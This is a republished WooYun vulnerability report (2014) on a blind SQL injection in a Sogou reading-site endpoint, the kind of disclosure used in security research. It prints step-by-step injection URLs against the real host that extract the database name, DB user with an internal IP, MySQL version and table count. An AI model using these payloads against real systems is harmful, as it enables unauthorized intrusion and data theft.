[公开漏洞]搜狗某站点存在SQL注入漏洞

    来源:WooYun 浏览:614次 时间:2014-06-17
搜狗某站点存在SQL注入漏洞 相关厂商: 搜狗 漏洞作者:梧桐雨 提交时间:2014-06-12 10:38 公开时间:2014-06-17 10:39 漏洞类型:SQL注射漏洞 危害等级:高 自评Rank:15 漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞 漏洞来源:http://www.wooyun.org Tags标签: php+字符类型注射 漏洞详情 披露状态:

2014-06-12:细节已通知厂商并且等待厂商处理中
2014-06-17:厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL,php字符类型盲注。

详细说明:

存在问题的站点:http://yuedu.sogou.com



搜狗的阅读站点。

通过and 1=2 and 1=1返回不一进行盲注。

当:and 1=1时

http://yuedu.sogou.com/ajax/user/buy/?bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6' and 1=1 and '1'='1

1.jpg



当:and 1=2时:

2.jpg



猜db长度

http://yuedu.sogou.com/ajax/user/buy/?bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6' and (length(database())=3) and '1'='1

为3



进一步猜测database名:

http://yuedu.sogou.com/ajax/user/buy/?bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6%27%20and%20(select%20ascii

(substring(database(),1,1))%20=%20119)%20and%20%271%27=%271

第一个字为w

以此类推:

database()为wap。

漏洞证明:

进一步,猜测user()



http://yuedu.sogou.com/ajax/user/buy/?

bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6%27%20and%20(length%20(user())

=16)%20and%20%271%27=%271



长度为16



进一步猜解。得:wap@10.14.138.68



http://yuedu.sogou.com/ajax/user/buy/?



bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6%27%20and%20(select%20ascii



(substring(version(),1,1))%20=%2053)%20and%20%271%27=%271



mysql版本5.0



http://yuedu.sogou.com/ajax/user/buy/?



bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6%27%20and%20(select%20count



(1)%20from%20information_schema.tables)=5232%20and%20%271%27=%271



居然有5232张表..



不继续了

修复方案:

过滤。

版权声明:转载请注明来源 梧桐雨@乌云 漏洞回应 厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-12 10:38

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细